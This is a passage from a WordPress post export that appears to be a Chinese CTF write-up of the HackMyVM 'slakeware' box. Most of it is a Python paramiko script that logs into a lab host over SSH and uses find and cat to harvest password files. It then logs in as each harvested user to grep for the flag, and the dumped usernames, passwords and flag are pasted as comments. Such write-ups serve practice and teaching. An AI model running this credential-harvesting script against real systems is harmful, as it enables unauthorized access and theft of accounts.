#!\/usr\/bin\/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2024\/9\/11 12:49\n# @Author  : hgbe02\n# @File    : slakeware_brute.py\n\nimport paramiko\n\nusernames = []\npasswords = []\n\ndef ssh_login_with_password(host, port, username, password):\n    # \u521b\u5efa\u4e00\u4e2a\u65b0\u7684 SSH \u5ba2\u6237\u7aef\u5bf9\u8c61\n    client = paramiko.SSHClient()\n    # \u81ea\u52a8\u6dfb\u52a0\u7b56\u7565\uff0c\u7528\u4e8e\u4fdd\u5b58\u670d\u52a1\u5668\u7684\u4e3b\u673a\u540d\u548c\u5bc6\u94a5\u4fe1\u606f\uff08\u81ea\u52a8\u4fdd\u5b58\uff09\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n    try:\n        # \u8fde\u63a5 SSH \u670d\u52a1\u7aef\uff0c\u8fd9\u91cc\u4f7f\u7528\u4e86\u5bc6\u7801\u65b9\u5f0f\u8fdb\u884c\u8ba4\u8bc1\n        client.connect(host, port=port, username=username, password=password)\n\n        # \u6267\u884c\u547d\u4ee4\u83b7\u53d6\u7528\u6237\u540d\n        stdin, stdout, stderr = client.exec_command(\n            "find ..\/ -name *pass* -type f 2>\/dev\/null | awk -F '[\/]' '{print $2}'"\n        )\n        output = stdout.read().decode().splitlines()\n        # print("[+] Username\\n", output)\n        global usernames\n        for line in output:\n            stripped_line = line.strip()\n            if stripped_line not in usernames:\n                usernames.append(stripped_line)\n\n        # \u6267\u884c\u547d\u4ee4\u83b7\u53d6\u5bc6\u7801\n        stdin, stdout, stderr = client.exec_command(\n            "find ..\/ -name '*pass*' -type f 2>\/dev\/null | xargs cat"\n        )\n        output = stdout.read().decode().splitlines()\n        # print("[+] Password\\n", output)\n        global passwords\n        for line in output:\n            stripped_line = line.strip()\n            if stripped_line not in passwords:\n                passwords.append(stripped_line)\n\n    except paramiko.AuthenticationException:\n        print("Authentication failed, please verify your credentials.")\n    except paramiko.SSHException as sshException:\n        print("Unable to establish SSH connection: " + str(sshException))\n    except Exception as e:\n        print("Exception in connecting to the server: " + str(e))\n    finally:\n        # \u5173\u95ed\u8fde\u63a5\n        client.close()\n\nssh_login_with_password('192.168.10.100', 1, 'patrick', 'trYth1sPasS1993')\n\na = 0\nwhile a < len(usernames):\n    ssh_login_with_password('192.168.10.100', 1, usernames[a], passwords[a])\n    a += 1\n\nprint('[+] username and password ! (\u272a\u03c9\u272a)')\nprint(usernames)\nprint(passwords)\n\n# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee',\n# 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft',\n# 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer',\n# 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos',\n# 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']\n#\n# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt',\n# 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc',\n# '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t',\n# 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg',\n# '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj',\n# 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh',\n# 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw',\n# 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']\n\ndef execute_command(host, port, username, password, command):\n    # \u521b\u5efa SSH \u5ba2\u6237\u7aef\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n    try:\n        # \u8fde\u63a5\u5230SSH\u670d\u52a1\u5668\n        client.connect(host, port=port, username=username, password=password)\n\n        # \u6267\u884c\u547d\u4ee4\n        stdin, stdout, stderr = client.exec_command(command)\n\n        # \u83b7\u53d6\u547d\u4ee4\u7ed3\u679c\n        output = stdout.read().decode('utf-8').strip()\n        error = stderr.read().decode('utf-8').strip()\n\n        if output:\n            print(f"[+] USER:{username} PASS:{password} => {output}")\n\n    except Exception as e:\n        print(f"An error occurred: {str(e)}")\n    finally:\n        # \u5173\u95ed\u8fde\u63a5\n        client.close()\n\nprint("[+] Search user flag (\u3063^_^)\u3063")\nfor i in range(0, len(usernames)):\n    execute_command('192.168.10.100', 1, usernames[i], passwords[i], "grep -Pnir 'hmv' .\/")\n\n# [+] username and password ! (\u272a\u03c9\u272a)\n# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee', 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft', 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer', 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos', 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']\n# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt', 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc', '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t', 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg', '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj', 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh', 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw', 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']\n# [+] Search user flag (\u3063^_^)\u3063\n# [+] USER:rpj7 PASS:wP26CtkDby6J => .\/user.txt:1:HMV{Th1s1s1Us3rFlag}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
slakeware \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware] \u2514 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-627","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/627","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=627"}],"version-history":[{"count":4,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/627\/revisions"}],"predecessor-version":[{"id":804,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/627\/revisions\/804"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=627"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=627"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=627"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}